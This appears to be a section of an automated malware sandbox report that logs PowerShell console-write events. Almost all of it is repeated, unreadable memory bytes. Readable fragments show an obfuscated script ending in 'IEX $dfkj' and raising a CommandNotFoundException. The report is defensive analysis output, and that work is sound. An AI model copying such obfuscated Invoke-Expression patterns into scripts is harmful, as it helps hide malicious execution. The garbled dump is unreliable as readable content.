Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....h.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....(.......0.b.....................l.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....`.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......:T.k......................7.............}..v....."......0.b.............H.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....#................7.............}..v....($......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....p.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....(.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....p.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....(.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................~.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....H.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v....X.......0.b.............H.T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....?...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....K...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....W...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....c...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....o...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{...............:T.k......T...............7.............}..v....X.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....{...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....8.......0.b.............H.T.....4.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....p ......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.....................l.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....h&................7.............}..v.....&......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......:T.k......T...............7.............}..v....x*......0.b.............H.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....0+................7.............}..v.....+......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....h&................7.............}..v.....&......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....-......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....h.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....P4......0.b.....................~.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....5................7.............}..v.....5......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v.....9......0.b.............H.T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....P:................7.............}..v.....:......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....A......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....PB................7.............}..v.....B......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....I......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....PJ................7.............}..v.....J......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....Q......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....PR................7.............}..v.....R......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....Y......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....PZ................7.............}..v.....Z......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+...............:T.k......T...............7.............}..v.....a......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+...............ZU.k....Pb................7.............}..v.....b......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....7...............:T.k......T...............7.............}..v.....i......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....7...............ZU.k....Pj................7.............}..v.....j......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....C...............:T.k......T...............7.............}..v.....q......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....C...............ZU.k....Pr................7.............}..v.....r......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....O...............:T.k......T...............7.............}..v.....y......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....O...............ZU.k....Pz................7.............}..v.....z......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....[.......e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....[...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....g...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....g...............ZU.k......................7.............}..v....H.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....x.......0.b.............H.T.....4.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s...............ZU.k....0.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................l.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....p.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v.... .......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v.... .......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.....................~.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................0.b..............................A}..... .........7.............}..v............ .................T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../.......e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w..../...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............:T.k......T...............7.............}..v....H.......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....;...............ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............0.b.............H.T.....4.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............ZU.k....h.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............:T.k......T...............7.............}..v....(.......0.b.....................l.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............ZU.k......................7.............}..v....`.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._....... .......:T.k......T...............7.............}..v............0.b.............H.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s...............:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....s...............ZU.k....`.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....`.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v....H.......0.b.....................~.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v............0.b.............H.T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....%......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....H&................7.............}..v.....&......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....-......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....H.................7.............}..v............0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....5......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....H6................7.............}..v.....6......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....=......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....H>................7.............}..v.....>......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....E......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....HF................7.............}..v.....F......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....M......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....HN................7.............}..v.....N......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............e.n.t.L.i.s.t. .$.a.;.b.r.e.a.k.;.}.}.;.;.I.E.X. .$.d.f.k.j.....0.b.............H.T.....<.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....S................7.............}..v....@T......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v.....[......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k.....[................7.............}..v....@\......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w............ . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....p`......0.b.............H.T.....4.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k....(a................7.............}..v.....a......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............:T.k......T...............7.............}..v.....f......0.b.....................l.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'...............ZU.k.....g................7.............}..v.... h......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3....... .......:T.k......T...............7.............}..v.....k......0.b.............H.T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....3...............ZU.k....hl................7.............}..v.....l......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............:T.k......T...............7.............}..v.....c......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....G...............ZU.k.....c................7.............}..v....@d......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............:T.k......T...............7.............}..v.....k......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....S...............ZU.k.....k................7.............}..v....@l......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............:T.k......T...............7.............}..v.....q......0.b.....................~.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...._...............ZU.k....`r................7.............}..v.....r......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.9.............}..v.....v......0.b.............H.T.....$.......(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....k...............ZU.k.....w................7.............}..v....(x......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............:T.k......T...............7.............}..v.....~......0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....w...............ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................ZU.k......................7.............}..v....(.......0.b...............T.............(...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................:T.k......T...............7.............}..v............0.b.............................(...............	Jump to behavior
